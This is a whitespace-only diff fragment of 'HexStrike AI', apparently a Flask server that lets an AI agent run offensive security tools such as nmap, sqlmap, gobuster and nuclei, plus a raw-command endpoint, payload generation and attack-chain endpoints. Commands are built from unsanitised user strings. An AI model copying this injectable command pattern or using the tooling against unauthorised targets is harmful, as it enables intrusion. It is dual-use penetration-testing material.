Dict[str, Any]: """List files in a directory""" try: dir_path = self.base_dir / directory if not dir_path.exists(): return {"success": False, "error": "Directory does not exist"} - + files = [] for item in dir_path.iterdir(): files.append({ @@ -7140,9 +7140,9 @@ class FileOperationsManager: "size": item.stat().st_size if item.is_file() else 0, "modified": datetime.fromtimestamp(item.stat().st_mtime).isoformat() }) - + return {"success": True, "files": files} - + except Exception as e: logger.error(f"โŒ Error listing files in {directory}: {e}") return {"success": False, "error": str(e)} @@ -7155,87 +7155,87 @@ file_manager = FileOperationsManager() @app.route("/health", methods=["GET"]) def health_check(): """Health check endpoint with comprehensive tool detection""" - + essential_tools = [ "nmap", "gobuster", "dirb", "nikto", "sqlmap", "hydra", "john", "hashcat" ] - + network_tools = [ "rustscan", "masscan", "autorecon", "nbtscan", "arp-scan", "responder", "nxc", "enum4linux-ng", "rpcclient", "enum4linux" ] - + web_security_tools = [ "ffuf", "feroxbuster", "dirsearch", "dotdotpwn", "xsser", "wfuzz", "gau", "waybackurls", "arjun", "paramspider", "x8", "jaeles", "dalfox", "httpx", "wafw00f", "burpsuite", "zaproxy", "katana", "hakrawler" ] - + vuln_scanning_tools = [ "nuclei", "wpscan", "graphql-scanner", "jwt-analyzer" ] - + password_tools = [ "medusa", "patator", "hash-identifier", "ophcrack", "hashcat-utils" ] - + binary_tools = [ "gdb", "radare2", "binwalk", "ropgadget", "checksec", "objdump", "ghidra", "pwntools", "one-gadget", "ropper", "angr", "libc-database", "pwninit" ] - + forensics_tools = [ "volatility3", "vol", "steghide", "hashpump", "foremost", "exiftool", "strings", "xxd", "file", "photorec", "testdisk", "scalpel", "bulk-extractor", "stegsolve", "zsteg", "outguess" ] - + cloud_tools = [ "prowler", "scout-suite", "trivy", "kube-hunter", "kube-bench", "docker-bench-security", "checkov", "terrascan", "falco", "clair" ] - + osint_tools = [ "amass", "subfinder", "fierce", "dnsenum", "theharvester", "sherlock", "social-analyzer", "recon-ng", "maltego", "spiderfoot", "shodan-cli", "censys-cli", "have-i-been-pwned" ] - + exploitation_tools = [ "metasploit", "exploit-db", "searchsploit" ] - + api_tools = [ "api-schema-analyzer", "postman", "insomnia", "curl", "httpie", "anew", "qsreplace", "uro" ] - + wireless_tools = [ "kismet", "wireshark", "tshark", "tcpdump" ] - + additional_tools = [ "smbmap", "volatility", "sleuthkit", "autopsy", "evil-winrm", "paramspider", "airmon-ng", "airodump-ng", "aireplay-ng", "aircrack-ng", "msfvenom", "msfconsole", "graphql-scanner", "jwt-analyzer" ] - + all_tools = ( essential_tools + network_tools + web_security_tools + vuln_scanning_tools + password_tools + binary_tools + forensics_tools + cloud_tools + osint_tools + exploitation_tools + api_tools + wireless_tools + additional_tools ) tools_status = {} - + for tool in all_tools: try: result = execute_command(f"which {tool}", use_cache=True) tools_status[tool] = result["success"] except: tools_status[tool] = False - + all_essential_tools_available = all(tools_status[tool] for tool in essential_tools) - + category_stats = { "essential": {"total": len(essential_tools), "available": sum(1 for tool in essential_tools if tools_status.get(tool, False))}, "network": {"total": len(network_tools), "available": sum(1 for tool in network_tools if tools_status.get(tool, False))}, @@ -7251,7 +7251,7 @@ def health_check(): "wireless": {"total": len(wireless_tools), "available": sum(1 for tool in wireless_tools if tools_status.get(tool, False))}, "additional": {"total": len(additional_tools), "available": sum(1 for tool in additional_tools if tools_status.get(tool, False))} } - + return jsonify({ "status": "healthy", "message": "HexStrike AI Tools API Server is operational", @@ -7273,13 +7273,13 @@ def generic_command(): params = request.json command = params.get("command", "") use_cache = params.get("use_cache", True) - + if not command: logger.warning("โš ๏ธ Command endpoint called without command parameter") return jsonify({ "error": "Command parameter is required" }), 400 - + result = execute_command(command, use_cache=use_cache) return jsonify(result) except Exception as e: @@ -7299,10 +7299,10 @@ def create_file(): filename = params.get("filename", "") content = params.get("content", "") binary = params.get("binary", False) - + if not filename: return jsonify({"error": "Filename is required"}), 400 - + result = file_manager.create_file(filename, content, binary) return jsonify(result) except Exception as e: @@ -7317,10 +7317,10 @@ def modify_file(): filename = params.get("filename", "") content = params.get("content", "") append = params.get("append", False) - + if not filename: return jsonify({"error": "Filename is required"}), 400 - + result = file_manager.modify_file(filename, content, append) return jsonify(result) except Exception as e: @@ -7333,10 +7333,10 @@ def delete_file(): try: params = request.json filename = params.get("filename", "") - + if not filename: return jsonify({"error": "Filename is required"}), 400 - + result = file_manager.delete_file(filename) return jsonify(result) except Exception as e: @@ -7364,10 +7364,10 @@ def generate_payload(): size = params.get("size", 1024) pattern = params.get("pattern", "A") filename = params.get("filename", f"payload_{int(time.time())}") - + if size > 100 * 1024 * 1024: # 100MB limit return jsonify({"error": "Payload size too large (max 100MB)"}), 400 - + if payload_type == "buffer": content = pattern * (size // len(pattern)) elif payload_type == "cyclic": @@ -7382,14 +7382,14 @@ def generate_payload(): content = ''.join(random.choices(string.ascii_letters + string.digits, k=size)) else: return jsonify({"error": "Invalid payload type"}), 400 - + result = file_manager.create_file(filename, content) result["payload_info"] = { "type": payload_type, "size": size, "pattern": pattern } - + logger.info(f"๐ŸŽฏ Generated {payload_type} payload: {filename} ({size} bytes)") return jsonify(result) except Exception as e: @@ -7425,18 +7425,18 @@ def list_processes(): """List all active processes""" try: processes = ProcessManager.list_active_processes() - + # Add calculated fields for each process for pid, info in processes.items(): runtime = time.time() - info["start_time"] info["runtime_formatted"] = f"{runtime:.1f}s" - + if info["progress"] > 0: eta = (runtime / info["progress"]) * (1.0 - info["progress"]) info["eta_formatted"] = f"{eta:.1f}s" else: info["eta_formatted"] = "Unknown" - + return jsonify({ "success": True, "active_processes": processes, @@ -7451,18 +7451,18 @@ def get_process_status(pid): """Get status of a specific process""" try: process_info = ProcessManager.get_process_status(pid) - + if process_info: # Add calculated fields runtime = time.time() - process_info["start_time"] process_info["runtime_formatted"] = f"{runtime:.1f}s" - + if process_info["progress"] > 0: eta = (runtime / process_info["progress"]) * (1.0 - process_info["progress"]) process_info["eta_formatted"] = f"{eta:.1f}s" else: process_info["eta_formatted"] = "Unknown" - + return jsonify({ "success": True, "process": process_info @@ -7472,7 +7472,7 @@ def get_process_status(pid): "success": False, "error": f"Process {pid} not found" }), 404 - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error getting process status: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -7482,7 +7482,7 @@ def terminate_process(pid): """Terminate a specific process""" try: success = ProcessManager.terminate_process(pid) - + if success: logger.info(f"๐Ÿ›‘ Process {pid} terminated successfully") return jsonify({ @@ -7494,7 +7494,7 @@ def terminate_process(pid): "success": False, "error": f"Failed to terminate process {pid} or process not found" }), 404 - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error terminating process {pid}: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -7504,7 +7504,7 @@ def pause_process(pid): """Pause a specific process""" try: success = ProcessManager.pause_process(pid) - + if success: logger.info(f"โธ๏ธ Process {pid} paused successfully") return jsonify({ @@ -7516,7 +7516,7 @@ def pause_process(pid): "success": False, "error": f"Failed to pause process {pid} or process not found" }), 404 - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error pausing process {pid}: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -7526,7 +7526,7 @@ def resume_process(pid): """Resume a paused process""" try: success = ProcessManager.resume_process(pid) - + if success: logger.info(f"โ–ถ๏ธ Process {pid} resumed successfully") return jsonify({ @@ -7538,7 +7538,7 @@ def resume_process(pid): "success": False, "error": f"Failed to resume process {pid} or process not found" }), 404 - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error resuming process {pid}: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -7549,10 +7549,10 @@ def process_dashboard(): try: processes = ProcessManager.list_active_processes() current_time = time.time() - + # Create beautiful dashboard using ModernVisualEngine dashboard_visual = ModernVisualEngine.create_live_dashboard(processes) - + dashboard = { "timestamp": datetime.now().isoformat(), "total_processes": len(processes), @@ -7564,19 +7564,19 @@ def process_dashboard(): "active_connections": len(psutil.net_connections()) } } - + for pid, info in processes.items(): runtime = current_time - info["start_time"] progress_fraction = info.get("progress", 0) - + # Create beautiful progress bar using ModernVisualEngine progress_bar = ModernVisualEngine.render_progress_bar( - progress_fraction, - width=25, + progress_fraction, + width=25, style='cyber', eta=info.get("eta", 0) ) - + process_status = { "pid": pid, "command": info["command"][:60] + "..." if len(info["command"]) > 60 else info["command"], @@ -7589,9 +7589,9 @@ def process_dashboard(): "last_output": info.get("last_output", "")[:100] } dashboard["processes"].append(process_status) - + return jsonify(dashboard) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error getting process dashboard: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -7603,16 +7603,16 @@ def create_vulnerability_card(): data = request.get_json() if not data: return jsonify({"error": "No data provided"}), 400 - + # Create vulnerability card card = ModernVisualEngine.render_vulnerability_card(data) - + return jsonify({ "success": True, "vulnerability_card": card, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error creating vulnerability card: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -7624,16 +7624,16 @@ def create_summary_report(): data = request.get_json() if not data: return jsonify({"error": "No data provided"}), 400 - + # Create summary report report = ModernVisualEngine.create_summary_report(data) - + return jsonify({ "success": True, "summary_report": report, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error creating summary report: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -7645,20 +7645,20 @@ def format_tool_output(): data = request.get_json() if not data or 'tool' not in data or 'output' not in data: return jsonify({"error": "Tool and output data required"}), 400 - + tool = data['tool'] output = data['output'] success = data.get('success', True) - + # Format tool output formatted_output = ModernVisualEngine.format_tool_output(tool, output, success) - + return jsonify({ "success": True, "formatted_output": formatted_output, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error formatting tool output: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -7674,22 +7674,22 @@ def analyze_target(): data = request.get_json() if not data or 'target' not in data: return jsonify({"error": "Target is required"}), 400 - + target = data['target'] logger.info(f"๐Ÿง  Analyzing target: {target}") - + # Use the decision engine to analyze the target profile = decision_engine.analyze_target(target) - + logger.info(f"โœ… Target analysis completed for {target}") logger.info(f"๐Ÿ“Š Target type: {profile.target_type.value}, Risk level: {profile.risk_level}") - + return jsonify({ "success": True, "target_profile": profile.to_dict(), "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error analyzing target: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -7701,20 +7701,20 @@ def select_optimal_tools(): data = request.get_json() if not data or 'target' not in data: return jsonify({"error": "Target is required"}), 400 - + target = data['target'] objective = data.get('objective', 'comprehensive') # comprehensive, quick, stealth - + logger.info(f"๐ŸŽฏ Selecting optimal tools for {target} with objective: {objective}") - + # Analyze target first profile = decision_engine.analyze_target(target) - + # Select optimal tools selected_tools = decision_engine.select_optimal_tools(profile, objective) - + logger.info(f"โœ… Selected {len(selected_tools)} tools for {target}") - + return jsonify({ "success": True, "target": target, @@ -7724,7 +7724,7 @@ def select_optimal_tools(): "tool_count": len(selected_tools), "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error selecting tools: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -7736,21 +7736,21 @@ def optimize_tool_parameters(): data = request.get_json() if not data or 'target' not in data or 'tool' not in data: return jsonify({"error": "Target and tool are required"}), 400 - + target = data['target'] tool = data['tool'] context = data.get('context', {}) - + logger.info(f"โš™๏ธ Optimizing parameters for {tool} against {target}") - + # Analyze target first profile = decision_engine.analyze_target(target) - + # Optimize parameters optimized_params = decision_engine.optimize_parameters(tool, profile, context) - + logger.info(f"โœ… Parameters optimized for {tool}") - + return jsonify({ "success": True, "target": target, @@ -7760,7 +7760,7 @@ def optimize_tool_parameters(): "optimized_parameters": optimized_params, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error optimizing parameters: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -7772,21 +7772,21 @@ def create_attack_chain(): data = request.get_json() if not data or 'target' not in data: return jsonify({"error": "Target is required"}), 400 - + target = data['target'] objective = data.get('objective', 'comprehensive') - + logger.info(f"โš”๏ธ Creating attack chain for {target} with objective: {objective}") - + # Analyze target first profile = decision_engine.analyze_target(target) - + # Create attack chain attack_chain = decision_engine.create_attack_chain(profile, objective) - + logger.info(f"โœ… Attack chain created with {len(attack_chain.steps)} steps") logger.info(f"๐Ÿ“Š Success probability: {attack_chain.success_probability:.2f}, Estimated time: {attack_chain.estimated_time}s") - + return jsonify({ "success": True, "target": target, @@ -7795,7 +7795,7 @@ def create_attack_chain(): "attack_chain": attack_chain.to_dict(), "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error creating attack chain: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -7807,19 +7807,19 @@ def intelligent_smart_scan(): data = request.get_json() if not data or 'target' not in data: return jsonify({"error": "Target is required"}), 400 - + target = data['target'] objective = data.get('objective', 'comprehensive') max_tools = data.get('max_tools', 5) - + logger.info(f"๐Ÿš€ Starting intelligent smart scan for {target}") - + # Analyze target profile = decision_engine.analyze_target(target) - + # Select optimal tools selected_tools = decision_engine.select_optimal_tools(profile, objective)[:max_tools] - + # Execute tools in parallel with real tool execution scan_results = { "target": target, @@ -7829,15 +7829,15 @@ def intelligent_smart_scan(): "execution_summary": {}, "combined_output": "" } - + def execute_single_tool(tool_name, target, profile): """Execute a single tool and return results""" try: logger.info(f"๐Ÿ”ง Executing {tool_name} with optimized parameters") - + # Get optimized parameters for this tool optimized_params = decision_engine.optimize_parameters(tool_name, profile) - + # Map tool names to their actual execution functions tool_execution_map = { 'nmap': lambda: execute_nmap_scan(target, optimized_params), @@ -7857,11 +7857,11 @@ def intelligent_smart_scan(): 'amass': lambda: execute_amass_scan(target, optimized_params), 'subfinder': lambda: execute_subfinder_scan(target, optimized_params) } - + # Execute the tool if we have a mapping for it if tool_name in tool_execution_map: result = tool_execution_map[tool_name]() - + # Extract vulnerability count from result vuln_count = 0 if result.get('success') and result.get('stdout'): @@ -7869,7 +7869,7 @@ def intelligent_smart_scan(): output = result.get('stdout', '') vuln_indicators = ['CRITICAL', 'HIGH', 'MEDIUM', 'VULNERABILITY', 'EXPLOIT', 'SQL injection', 'XSS', 'CSRF'] vuln_count = sum(1 for indicator in vuln_indicators if indicator.lower() in output.lower()) - + return { "tool": tool_name, "parameters": optimized_params, @@ -7892,7 +7892,7 @@ def intelligent_smart_scan(): "error": f"Tool {tool_name} not implemented in execution map", "success": False } - + except Exception as e: logger.error(f"โŒ Error executing {tool_name}: {str(e)}") return { @@ -7902,34 +7902,34 @@ def intelligent_smart_scan(): "error": str(e), "success": False } - + # Execute tools in parallel using ThreadPoolExecutor with ThreadPoolExecutor(max_workers=min(len(selected_tools), 5)) as executor: # Submit all tool executions future_to_tool = { - executor.submit(execute_single_tool, tool, target, profile): tool + executor.submit(execute_single_tool, tool, target, profile): tool for tool in selected_tools } - + # Collect results as they complete for future in future_to_tool: tool_result = future.result() scan_results["tools_executed"].append(tool_result) - + # Accumulate vulnerability count if tool_result.get("vulnerabilities_found"): scan_results["total_vulnerabilities"] += tool_result["vulnerabilities_found"] - + # Combine outputs if tool_result.get("stdout"): scan_results["combined_output"] += f"\n=== {tool_result['tool'].upper()} OUTPUT ===\n" scan_results["combined_output"] += tool_result["stdout"] scan_results["combined_output"] += "\n" + "="*50 + "\n" - + # Create execution summary successful_tools = [t for t in scan_results["tools_executed"] if t.get("success")] failed_tools = [t for t in scan_results["tools_executed"] if not t.get("success")] - + scan_results["execution_summary"] = { "total_tools": len(selected_tools), "successful_tools": len(successful_tools), @@ -7938,16 +7938,16 @@ def intelligent_smart_scan(): "total_execution_time": sum(t.get("execution_time", 0) for t in scan_results["tools_executed"]), "tools_used": [t["tool"] for t in successful_tools] } - + logger.info(f"โœ… Intelligent smart scan completed for {target}") logger.info(f"๐Ÿ“Š Results: {len(successful_tools)}/{len(selected_tools)} tools successful, {scan_results['total_vulnerabilities']} vulnerabilities found") - + return jsonify({ "success": True, "scan_results": scan_results, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in intelligent smart scan: {str(e)}") return jsonify({"error": f"Server error: {str(e)}", "success": False}), 500 @@ -7959,7 +7959,7 @@ def execute_nmap_scan(target, params): scan_type = params.get('scan_type', '-sV') ports = params.get('ports', '') additional_args = params.get('additional_args', '') - + # Build nmap command cmd_parts = ['nmap', scan_type] if ports: @@ -7967,7 +7967,7 @@ def execute_nmap_scan(target, params): if additional_args: cmd_parts.extend(additional_args.split()) cmd_parts.append(target) - + return execute_command(' '.join(cmd_parts)) except Exception as e: return {"success": False, "error": str(e)} @@ -7978,11 +7978,11 @@ def execute_gobuster_scan(target, params): mode = params.get('mode', 'dir') wordlist = params.get('wordlist', '/usr/share/wordlists/dirb/common.txt') additional_args = params.get('additional_args', '') - + cmd_parts = ['gobuster', mode, '-u', target, '-w', wordlist] if additional_args: cmd_parts.extend(additional_args.split()) - + return execute_command(' '.join(cmd_parts)) except Exception as e: return {"success": False, "error": str(e)} @@ -7993,7 +7993,7 @@ def execute_nuclei_scan(target, params): severity = params.get('severity', '') tags = params.get('tags', '') additional_args = params.get('additional_args', '') - + cmd_parts = ['nuclei', '-u', target] if severity: cmd_parts.extend(['-severity', severity]) @@ -8001,7 +8001,7 @@ def execute_nuclei_scan(target, params): cmd_parts.extend(['-tags', tags]) if additional_args: cmd_parts.extend(additional_args.split()) - + return execute_command(' '.join(cmd_parts)) except Exception as e: return {"success": False, "error": str(e)} @@ -8013,7 +8013,7 @@ def execute_nikto_scan(target, params): cmd_parts = ['nikto', '-h', target] if additional_args: cmd_parts.extend(additional_args.split()) - + return execute_command(' '.join(cmd_parts)) except Exception as e: return {"success": False, "error": str(e)} @@ -8025,7 +8025,7 @@ def execute_sqlmap_scan(target, params): cmd_parts = ['sqlmap', '-u', target] if additional_args: cmd_parts.extend(additional_args.split()) - + return execute_command(' '.join(cmd_parts)) except Exception as e: return {"success": False, "error": str(e)} @@ -8035,15 +8035,15 @@ def execute_ffuf_scan(target, params): try: wordlist = params.get('wordlist', '/usr/share/wordlists/dirb/common.txt') additional_args = params.get('additional_args', '') - + # Ensure target has FUZZ placeholder if 'FUZZ' not in target: target = target.rstrip('/') + '/FUZZ' - + cmd_parts = ['ffuf', '-u', target, '-w', wordlist] if additional_args: cmd_parts.extend(additional_args.split()) - + return execute_command(' '.join(cmd_parts)) except Exception as e: return {"success": False, "error": str(e)} @@ -8053,11 +8053,11 @@ def execute_feroxbuster_scan(target, params): try: wordlist = params.get('wordlist', '/usr/share/wordlists/dirb/common.txt') additional_args = params.get('additional_args', '') - + cmd_parts = ['feroxbuster', '-u', target, '-w', wordlist] if additional_args: cmd_parts.extend(additional_args.split()) - + return execute_command(' '.join(cmd_parts)) except Exception as e: return {"success": False, "error": str(e)} @@ -8069,7 +8069,7 @@ def execute_katana_scan(target, params): cmd_parts = ['katana', '-u', target] if additional_args: cmd_parts.extend(additional_args.split()) - + return execute_command(' '.join(cmd_parts)) except Exception as e: return {"success": False, "error": str(e)} @@ -8080,7 +8080,7 @@ def execute_httpx_scan(target, params): additional_args = params.get('additional_args', '-tech-detect -status-code') # Use shell command with pipe for httpx cmd = f"echo {target} | httpx {additional_args}" - + return execute_command(cmd) except Exception as e: return {"success": False, "error": str(e)} @@ -8092,7 +8092,7 @@ def execute_wpscan_scan(target, params): cmd_parts = ['wpscan', '--url', target] if additional_args: cmd_parts.extend(additional_args.split()) - + return execute_command(' '.join(cmd_parts)) except Exception as e: return {"success": False, "error": str(e)} @@ -8104,7 +8104,7 @@ def execute_dirsearch_scan(target, params): cmd_parts = ['dirsearch', '-u', target] if additional_args: cmd_parts.extend(additional_args.split()) - + return execute_command(' '.join(cmd_parts)) except Exception as e: return {"success": False, "error": str(e)} @@ -8116,7 +8116,7 @@ def execute_arjun_scan(target, params): cmd_parts = ['arjun', '-u', target] if additional_args: cmd_parts.extend(additional_args.split()) - + return execute_command(' '.join(cmd_parts)) except Exception as e: return {"success": False, "error": str(e)} @@ -8128,7 +8128,7 @@ def execute_paramspider_scan(target, params): cmd_parts = ['paramspider', '-d', target] if additional_args: cmd_parts.extend(additional_args.split()) - + return execute_command(' '.join(cmd_parts)) except Exception as e: return {"success": False, "error": str(e)} @@ -8140,7 +8140,7 @@ def execute_dalfox_scan(target, params): cmd_parts = ['dalfox', 'url', target] if additional_args: cmd_parts.extend(additional_args.split()) - + return execute_command(' '.join(cmd_parts)) except Exception as e: return {"success": False, "error": str(e)} @@ -8152,7 +8152,7 @@ def execute_amass_scan(target, params): cmd_parts = ['amass', 'enum', '-d', target] if additional_args: cmd_parts.extend(additional_args.split()) - + return execute_command(' '.join(cmd_parts)) except Exception as e: return {"success": False, "error": str(e)} @@ -8164,7 +8164,7 @@ def execute_subfinder_scan(target, params): cmd_parts = ['subfinder', '-d', target] if additional_args: cmd_parts.extend(additional_args.split()) - + return execute_command(' '.join(cmd_parts)) except Exception as e: return {"success": False, "error": str(e)} @@ -8176,14 +8176,14 @@ def detect_technologies(): data = request.get_json() if not data or 'target' not in data: return jsonify({"error": "Target is required"}), 400 - + target = data['target'] - + logger.info(f"๐Ÿ” Detecting technologies for {target}") - + # Analyze target profile = decision_engine.analyze_target(target) - + # Get technology-specific recommendations tech_recommendations = {} for tech in profile.technologies: @@ -8205,9 +8205,9 @@ def detect_technologies(): "focus_areas": ["prototype pollution", "dependency vulnerabilities"], "priority": "medium" } - + logger.info(f"โœ… Technology detection completed for {target}") - + return jsonify({ "success": True, "target": target, @@ -8217,7 +8217,7 @@ def detect_technologies(): "target_profile": profile.to_dict(), "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in technology detection: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -8233,14 +8233,14 @@ def create_reconnaissance_workflow(): data = request.get_json() if not data or 'domain' not in data: return jsonify({"error": "Domain is required"}), 400 - + domain = data['domain'] scope = data.get('scope', []) out_of_scope = data.get('out_of_scope', []) program_type = data.get('program_type', 'web') - + logger.info(f"๐ŸŽฏ Creating reconnaissance workflow for {domain}") - + # Create bug bounty target target = BugBountyTarget( domain=domain, @@ -8248,18 +8248,18 @@ def create_reconnaissance_workflow(): out_of_scope=out_of_scope, program_type=program_type ) - + # Generate reconnaissance workflow workflow = bugbounty_manager.create_reconnaissance_workflow(target) - + logger.info(f"โœ… Reconnaissance workflow created for {domain}") - + return jsonify({ "success": True, "workflow": workflow, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error creating reconnaissance workflow: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -8271,31 +8271,31 @@ def create_vulnerability_hunting_workflow(): data = request.get_json() if not data or 'domain' not in data: return jsonify({"error": "Domain is required"}), 400 - + domain = data['domain'] priority_vulns = data.get('priority_vulns', ["rce", "sqli", "xss", "idor", "ssrf"]) bounty_range = data.get('bounty_range', 'unknown') - + logger.info(f"๐ŸŽฏ Creating vulnerability hunting workflow for {domain}") - + # Create bug bounty target target = BugBountyTarget( domain=domain, priority_vulns=priority_vulns, bounty_range=bounty_range ) - + # Generate vulnerability hunting workflow workflow = bugbounty_manager.create_vulnerability_hunting_workflow(target) - + logger.info(f"โœ… Vulnerability hunting workflow created for {domain}") - + return jsonify({ "success": True, "workflow": workflow, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error creating vulnerability hunting workflow: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -8307,26 +8307,26 @@ def create_business_logic_workflow(): data = request.get_json() if not data or 'domain' not in data: return jsonify({"error": "Domain is required"}), 400 - + domain = data['domain'] program_type = data.get('program_type', 'web') - + logger.info(f"๐ŸŽฏ Creating business logic testing workflow for {domain}") - + # Create bug bounty target target = BugBountyTarget(domain=domain, program_type=program_type) - + # Generate business logic testing workflow workflow = bugbounty_manager.create_business_logic_testing_workflow(target) - + logger.info(f"โœ… Business logic testing workflow created for {domain}") - + return jsonify({ "success": True, "workflow": workflow, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error creating business logic workflow: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -8338,25 +8338,25 @@ def create_osint_workflow(): data = request.get_json() if not data or 'domain' not in data: return jsonify({"error": "Domain is required"}), 400 - + domain = data['domain'] - + logger.info(f"๐ŸŽฏ Creating OSINT workflow for {domain}") - + # Create bug bounty target target = BugBountyTarget(domain=domain) - + # Generate OSINT workflow workflow = bugbounty_manager.create_osint_workflow(target) - + logger.info(f"โœ… OSINT workflow created for {domain}") - + return jsonify({ "success": True, "workflow": workflow, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error creating OSINT workflow: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -8368,26 +8368,26 @@ def create_file_upload_testing(): data = request.get_json() if not data or 'target_url' not in data: return jsonify({"error": "Target URL is required"}), 400 - + target_url = data['target_url'] - + logger.info(f"๐ŸŽฏ Creating file upload testing workflow for {target_url}") - + # Generate file upload testing workflow workflow = fileupload_framework.create_upload_testing_workflow(target_url) - + # Generate test files test_files = fileupload_framework.generate_test_files() workflow["test_files"] = test_files - + logger.info(f"โœ… File upload testing workflow created for {target_url}") - + return jsonify({ "success": True, "workflow": workflow, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error creating file upload testing workflow: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -8399,54 +8399,54 @@ def create_comprehensive_bugbounty_assessment(): data = request.get_json() if not data or 'domain' not in data: return jsonify({"error": "Domain is required"}), 400 - + domain = data['domain'] scope = data.get('scope', []) priority_vulns = data.get('priority_vulns', ["rce", "sqli", "xss", "idor", "ssrf"]) include_osint = data.get('include_osint', True) include_business_logic = data.get('include_business_logic', True) - + logger.info(f"๐ŸŽฏ Creating comprehensive bug bounty assessment for {domain}") - + # Create bug bounty target target = BugBountyTarget( domain=domain, scope=scope, priority_vulns=priority_vulns ) - + # Generate all workflows assessment = { "target": domain, "reconnaissance": bugbounty_manager.create_reconnaissance_workflow(target), "vulnerability_hunting": bugbounty_manager.create_vulnerability_hunting_workflow(target) } - + if include_osint: assessment["osint"] = bugbounty_manager.create_osint_workflow(target) - + if include_business_logic: assessment["business_logic"] = bugbounty_manager.create_business_logic_testing_workflow(target) - + # Calculate total estimates total_time = sum(workflow.get("estimated_time", 0) for workflow in assessment.values() if isinstance(workflow, dict)) total_tools = sum(workflow.get("tools_count", 0) for workflow in assessment.values() if isinstance(workflow, dict)) - + assessment["summary"] = { "total_estimated_time": total_time, "total_tools": total_tools, "workflow_count": len([k for k in assessment.keys() if k != "target"]), "priority_score": assessment["vulnerability_hunting"].get("priority_score", 0) } - + logger.info(f"โœ… Comprehensive bug bounty assessment created for {domain}") - + return jsonify({ "success": True, "assessment": assessment, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error creating comprehensive assessment: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -8465,25 +8465,25 @@ def nmap(): ports = params.get("ports", "") additional_args = params.get("additional_args", "-T4 -Pn") use_recovery = params.get("use_recovery", True) - + if not target: logger.warning("๐ŸŽฏ Nmap called without target parameter") return jsonify({ "error": "Target parameter is required" }), 400 - + command = f"nmap {scan_type}" - + if ports: command += f" -p {ports}" - + if additional_args: command += f" {additional_args}" - + command += f" {target}" - + logger.info(f"๐Ÿ” Starting Nmap scan: {target}") - + # Use intelligent error handling if enabled if use_recovery: tool_params = { @@ -8495,10 +8495,10 @@ def nmap(): result = execute_command_with_recovery("nmap", command, tool_params) else: result = execute_command(command) - + logger.info(f"๐Ÿ“Š Nmap scan completed for {target}") return jsonify(result) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in nmap endpoint: {str(e)}") return jsonify({ @@ -8515,27 +8515,27 @@ def gobuster(): wordlist = params.get("wordlist", "/usr/share/wordlists/dirb/common.txt") additional_args = params.get("additional_args", "") use_recovery = params.get("use_recovery", True) - + if not url: logger.warning("๐ŸŒ Gobuster called without URL parameter") return jsonify({ "error": "URL parameter is required" }), 400 - + # Validate mode if mode not in ["dir", "dns", "fuzz", "vhost"]: logger.warning(f"โŒ Invalid gobuster mode: {mode}") return jsonify({ "error": f"Invalid mode: {mode}. Must be one of: dir, dns, fuzz, vhost" }), 400 - + command = f"gobuster {mode} -u {url} -w {wordlist}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ“ Starting Gobuster {mode} scan: {url}") - + # Use intelligent error handling if enabled if use_recovery: tool_params = { @@ -8547,10 +8547,10 @@ def gobuster(): result = execute_command_with_recovery("gobuster", command, tool_params) else: result = execute_command(command) - + logger.info(f"๐Ÿ“Š Gobuster scan completed for {url}") return jsonify(result) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in gobuster endpoint: {str(e)}") return jsonify({ @@ -8568,29 +8568,29 @@ def nuclei(): template = params.get("template", "") additional_args = params.get("additional_args", "") use_recovery = params.get("use_recovery", True) - + if not target: logger.warning("๐ŸŽฏ Nuclei called without target parameter") return jsonify({ "error": "Target parameter 